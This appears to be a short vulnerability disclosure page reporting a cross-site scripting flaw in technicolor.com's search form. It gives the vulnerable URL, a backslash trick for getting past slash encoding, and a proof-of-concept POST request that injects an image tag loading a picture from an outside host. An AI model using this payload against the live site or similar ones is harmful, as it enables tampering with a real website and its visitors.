Technicolor.com search form XSS bug
Vulnerable page: http://www.technicolor.com/search/In order to reproduce the bug, you have to replace any forward slash / with backslash \ because forward slash is being URL encoded.
PoC
POST /search/ HTTP/1.1Host: www.technicolor.com
search_block_form=<img src=http:\\te-home.net\gallery\xssd_by_teamelite.png>
You can either include any XSS code in search input box, or request any XSS code directly using POST method and search_block_form parameter.
Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Comments
| Date | Author | Comment |
|---|---|---|
| - | - | Leave your comment |
| 2016-05-14 15:10 | Sam | I have Technicolor router ![]() |
| - | - | Leave your comment |
News
Work
Network
Forum
Gallery
Hublist
Tools
Statistics
About
Login

